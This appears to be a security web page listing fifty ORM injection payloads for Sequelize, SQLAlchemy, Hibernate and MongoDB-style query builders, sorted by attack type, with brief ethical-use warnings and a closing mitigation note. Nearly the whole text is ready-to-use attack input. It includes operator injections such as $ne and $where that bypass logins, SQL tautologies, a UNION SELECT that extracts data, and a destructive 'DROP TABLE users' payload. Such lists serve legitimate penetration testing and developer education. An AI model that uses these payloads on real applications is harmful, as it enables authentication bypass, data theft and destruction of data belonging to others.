ORM injection

Tags

Object-Relational Mapping (ORM) injection is a type of attack where attackers manipulate queries generated by ORM frameworks (e.g., Hibernate, SQLAlchemy, Sequelize) to exploit vulnerabilities in applications. Unlike traditional SQL injection, ORM injection targets the query-building logic of ORM frameworks, often by injecting malicious input that alters the query’s structure or bypasses security checks. Below is a list of 50 example ORM injection payloads, designed to test for vulnerabilities in applications using ORMs. These payloads are generalized and may need adaptation based on the specific ORM framework (e.g., Hibernate for Java, SQLAlchemy for Python, Sequelize for Node.js) and the application’s query patterns.

Warning: These payloads are for educational and ethical testing purposes only, in controlled environments with explicit permission. Unauthorized use is illegal and unethical. Always test responsibly in a legal, authorized environment.

ORM Injection Payload Characteristics

ORM injection payloads typically:

  • Exploit unsanitized user input in ORM query methods (e.g., find, where, filter).
  • Manipulate query conditions to bypass authentication, extract data, or alter logic.
  • Use logical operators, wildcards, or malformed input to exploit query construction.
  • May resemble SQL injection but are tailored to ORM syntax (e.g., JSON-like objects, method calls).

The payloads below assume common ORM query patterns, such as Model.find({ username: input }) (Sequelize) or session.query(User).filter(User.name == input) (SQLAlchemy). They are grouped by attack type and ORM framework where applicable.

ORM Injection Payloads

Authentication Bypass Payloads

These aim to bypass login checks by manipulating conditions (e.g., making queries always true).

  1. {"username": {"$ne": null}, "password": {"$ne": null}} - Sequelize/MongoDB ORM: Matches any non-null username/password.
  2. {"username": "admin", "password": {"$gt": ""}} - Bypasses password check with a greater-than condition.
  3. {"$or": [{"username": "admin"}, {"password": "anything"}]} - Sequelize: OR condition to bypass authentication.
  4. {"username": {"$eq": "admin"}, "password": {"$exists": true}} - Matches admin with any existing password.
  5. admin' OR '1'='1 - SQLAlchemy/Hibernate: Injects SQL-like OR condition if ORM converts to raw SQL.
  6. {"username": "admin", "password": {"$in": ["valid", "invalid"]}} - Matches multiple password values.
  7. {"username": {"$regex": ".*admin.*"}, "password": {"$ne": null}} - Regex to match usernames containing “admin”.
  8. admin' OR TRUE -- - SQLAlchemy: Appends true condition to bypass checks.
  9. {"username": {"$not": {"$eq": "guest"}}, "password": {"$ne": null}} - Excludes guest users.
  10. {"$where": "this.username == 'admin'"} - Sequelize with MongoDB: JavaScript condition bypass.

Data Extraction Payloads

These aim to retrieve unauthorized data by broadening query scope.

  1. {"username": {"$ne": "none"}} - Matches all non-“none” usernames.
  2. {"id": {"$gt": 0}} - Retrieves all records with ID greater than 0.
  3. {"$or": [{"id": {"$gt": 0}}, {"id": {"$lt": 0}}]} - Matches all IDs (positive or negative).
  4. {"username": {"$regex": ".*"}} - Matches all usernames with any characters.
  5. {"email": {"$exists": true}} - Retrieves all records with an email field.
  6. {"*": "*"} - Wildcard to match all fields (if ORM allows wildcard queries).
  7. {"id": {"$in": [1, 2, 3, 4, 5]}} - Retrieves specific IDs.
  8. {"username": {"$like": "%admin%"}} - SQLAlchemy/Sequelize: Matches usernames containing “admin”.
  9. {"$and": [{"id": {"$gt": 0}}, {"id": {"$lte": 999999}}]} - Matches a broad ID range.
  10. {"role": {"$eq": "admin"}} - Retrieves admin users directly.

Logic Manipulation Payloads

These alter query logic to change application behavior.

  1. {"active": {"$ne": false}} - Matches all active records.
  2. {"$or": [{"active": true}, {"active": false}]} - Matches all records regardless of active status.
  3. {"created_at": {"$gt": "1900-01-01"}} - Matches records with any realistic creation date.
  4. {"username": {"$not": {"$eq": null}}} - Matches non-null usernames.
  5. {"password": {"$type": "string"}} - Targets string-type passwords.
  6. {"$where": "this.id > 0"} - JavaScript condition to match positive IDs.
  7. {"status": {"$in": ["active", "pending"]}} - Matches specific statuses.
  8. {"username": {"$nin": ["guest", "test"]}} - Excludes specific usernames.
  9. {"$or": [{"role": "admin"}, {"role": "user"}]} - Matches multiple roles.
  10. {"updated_at": {"$exists": true}} - Matches records with an updated timestamp.

SQL-Like Injection in ORM

If the ORM converts queries to raw SQL, these mimic SQL injection patterns.

  1. admin'-- - Comments out the rest of the query (SQLAlchemy/Hibernate).
  2. admin' OR '1'='1'-- - Makes the query always true.
  3. admin' AND '1'='1 - Appends trivial true condition.
  4. admin'; DROP TABLE users; -- - Attempts destructive SQL if ORM allows raw queries.
  5. admin' UNION SELECT * FROM users -- - Attempts to extract data via UNION.
  6. admin' OR username LIKE '% - Broadens username search with LIKE.
  7. admin' AND password IS NOT NULL -- - Matches non-null passwords.
  8. admin' OR id > 0 -- - Matches all positive IDs.
  9. admin' OR TRUE - Forces true condition in SQL-like ORMs.
  10. admin'; SELECT * FROM users WHERE '1'='1 - Attempts raw SQL execution.

Array and Object Manipulation Payloads

These target ORMs that handle complex data structures.

  1. {"roles": {"$elemMatch": {"$eq": "admin"}}} - Matches admin role in an array.
  2. {"permissions": {"$all": ["read", "write"]}} - Matches records with specific permissions.
  3. {"tags": {"$contains": "public"}} - Matches records with specific tags.
  4. {"metadata": {"$exists": true}} - Matches records with metadata fields.
  5. {"settings": {"$ne": {}}} - Matches non-empty settings objects.
  6. {"$or": [{"data": {"$ne": null}}, {"data": null}]} - Matches all records with or without data.
  7. {"attributes": {"$size": 1}} - Matches records with exactly one attribute.
  8. {"profile": {"$regex": ".*"}} - Matches any profile data.
  9. {"$and": [{"tags": "admin"}, {"tags": "user"}]} - Matches records with multiple tags.
  10. {"data": {"$type": "object"}} - Matches records with object-type data.

Notes

  • ORM-Specific: Payloads must be tailored to the ORM framework (e.g., Sequelize uses JSON-like syntax, Hibernate uses HQL, SQLAlchemy uses Python expressions). Test the ORM’s query syntax first.
  • Encoding: For web applications, payloads may need URL or JSON encoding (e.g., [$ne] becomes %5B%24ne%5D).
  • Common Targets: Authentication endpoints, search filters, and data retrieval APIs are prone to ORM injection.
  • Ethical Use: Only test systems you own or have explicit permission to test. Unauthorized testing is illegal.
  • Mitigation: Developers should use parameterized queries, validate and sanitize inputs, and avoid exposing ORM operators (e.g., $ne, $gt) to user input. Use safe query-building methods (e.g., Model.findById instead of Model.find with raw input).
LinkedIn Reddit